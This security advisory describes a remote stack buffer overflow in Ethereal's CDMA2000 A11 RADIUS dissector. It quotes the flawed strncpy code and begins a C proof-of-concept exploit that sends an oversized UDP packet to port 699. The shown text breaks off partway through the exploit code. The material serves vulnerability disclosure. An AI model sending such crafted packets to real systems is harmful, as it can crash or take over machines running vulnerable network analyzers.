Summary
Ethereal is a network sniffer used by network professionals around the world for troubleshooting, analysis, software and protocol development, and education.

Ethereal is vulnerable to a stack based buffer overflow in the CDMA2000 of 3G filter. This may allow an attacker to run arbitrary machine code on a vulnerable host.

Credit:
The information has been provided by LSS Security.
The original article can be found at: http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-03-04

Details
Vulnerable Systems:
* Ethereal 0.10.9 and prior versions may vulnerable as well.

Vulnerable Code:
There is a remote buffer overflow vulnerability in Ethereal dissector for CDMA2000 A11 packets. Vulnerability is located in dissect_a11_radius() function in packet-3g-a11.c used for RADIUS authentication dissection. The number of bytes that will be copied from packet to buffer in stack is taken from packet itself. 16 bytes are reserved for that buffer, and string length can be up to 256 bytes (unsigned char), it is possible to overflow local variables and return address.
packet-3g-a11.c:

#define MAX_STRVAL 16
...
dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
{
...
size_t radius_len;
...
guchar str_val[MAX_STRVAL];
...
radius_len = tvb_get_guint8(tvb, offset + 1);
...
strncpy(str_val, tvb_get_ptr(tvb,offset+2,radius_len-2), radius_len-2);
...
}

A similar vulnerability was also found at the same function a few lines below where RADIUS attributes are copied to stack.
packet-3g-a11.c:
#define MAX_STRVAL 16
...
dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
{
...
guint attribute_len;
...
guchar str_val[MAX_STRVAL];
...
attribute_len = tvb_get_guint8(tvb, offset + radius_offset + 1);
...
case ATTR_TYPE_STR:
strncpy(str_val,tvb_get_ptr(tvb,offset+radius_offset+2,attribute_len - 2),
attribute_len - 2);

...
}

Exploit:
/*
*
* Ethereal 3G-A11 remote buffer overflow PoC exploit
* --------------------------------------------------
* Coded by Leon Juranic <ljuranic@lss.hr>
* LSS Security <http://security.lss.hr/en/>
*
*/

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

main (int argc, char **argv)
{
int sock;
struct sockaddr_in sin;
unsigned char buf[1024];
char bla[200];

sock=socket(AF_INET,SOCK_DGRAM,0);

sin.sin_family=AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_port = htons(699);

buf[0] = 22;
memset(buf+1,'A',19);
buf[20] = 38;
*(unsigned short*)&buf[22] = htons(100);
*(unsigned short*)&buf[28] = 0x0101;
buf[30] = 31;
buf[31] = 150; // len for overflow...play with this value if it doesn't work